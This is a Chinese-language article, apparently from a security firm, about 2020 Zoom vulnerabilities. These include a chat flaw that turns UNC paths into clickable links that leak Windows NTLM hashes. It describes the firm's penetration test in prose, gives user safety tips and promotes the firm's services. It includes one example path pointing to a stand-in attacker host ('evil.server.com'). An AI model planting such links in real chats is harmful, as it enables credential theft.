私隱隨時外洩 直擊Zoom安全漏洞 | 文章 – 滙豐機滙

Zoom又被爆出嚴重安全漏洞!攻擊者可利用聊天室竊取Windows 的登陸憑證!UD即時「ZOOM」 入研究測試漏洞 。

科技  ·    ·  2 mins read


私隱隨時外洩  直擊Zoom安全漏洞

因應肺炎疫情在世界各地爆發,基於防疫考慮,不少企業和學校紛紛採取在家工作或網上授課等措施。在人人不出門的情況下,免費會議程式如Zoom等便大行其道。 

然而因疫情而備受矚目、2020年頭兩個月錄得超過2百萬客戶增長的Zoom,近期接連爆出嚴重安全漏洞,包括有未上鎖的會議遭陌生人「亂入」、會議內容未經加密、攻擊者可利用聊天室竊取Windows 的登錄憑證以入侵他人帳戶等,情況令人關注。

漏洞接二連三 程式安全成疑

早前,資訊安全研究員 _g0dmode 發現利用Zoom 客戶端將Windows網絡UNC路徑轉換為聊天消息中的可點擊鏈結,如將常規URL和UNC路徑\\ evil.server.com \ images \ cat.jpg都被轉換為可點擊鏈接。用戶一經打開鏈結,就好像默許了Windows將用戶的登錄資料及NTLM密碼hash發送出去,攻擊者就可以輕易入侵使用者賬戶。另一位安全研究員 Matthew Hickey (@HackerFantastic) 日前也在Twitter 宣布成功拿到Windows NTLM 密碼。而香港近期亦有學校在使用Zoom進行網上授課期間,因連結外洩而遭到不明人士插播不雅圖片。即使不是專業的技術人員,也開始質疑這些免費會議程式是否如想像中安全。

UD網絡安全專家實測 成功入侵用家電腦

科學講求實踐,UD網絡安全團隊特地透過人手滲透測試,從攻擊者角度完成對Zoom的實測。

團隊成員分別飾演針對Zoom漏洞進行攻擊的駭客及其使用者。經過深入研究,加以利用UNC路徑,透過系統管理員常用的putty去做成Backdoor,發現能隨時擷取到其他Zoom與會者的螢幕。使用同一方法,甚至可以假冒身份(例如冒充教師向學生派發功課)發放惡意程式或設置鍵盤監聽,盜取使用者的密碼和個人資料。

網絡安全有如防盜系統 不容忽視

企業因會議程式漏洞而遭駭客入侵,商業機密和大量員工資料隨時有外洩的風險,這些資料甚至有可能被不法之徒用以勒索鉅額款項,令企業在逆境中蒙受更大損失,雪上加霜。

除了使用軟件時顯示的安全提示之外,UDomain特別提醒用戶留意以下幾點:

1️⃣使用Zoom 聊天室時,提防來源不明的鏈結,特別是UNC 路徑鏈結 

2️⃣保持電腦作業系統更新,必須安裝防毒軟件,定時更新病毒資料庫 

3️⃣必須設定聊天室密碼,以免駭客藉機散播惡意程式

4️⃣如發現電腦系統或資料庫有被入侵跡象,須立刻向網絡安全公司尋求協助

UDomain網絡安全團隊,是全港首家獲得2個CVE國際認證雲端服務供應商。如擔心電腦系統遭到入侵,或希望未雨綢繆預先堵塞漏洞,歡迎致電 (852) 2554-7545與我們聯絡,UDomain網絡安全團隊都樂意為你效勞。

✅什麼是CVE認證: https://www.udomain.hk/tc/news/293

UDomain獲發認證編號: CVE-2019-9884 (繞過驗證漏洞) 及 CVE-2019-9885 (SQL Injection 漏洞)


UDomain HK
UDomain HK
UDOMAIN
UDOMAIN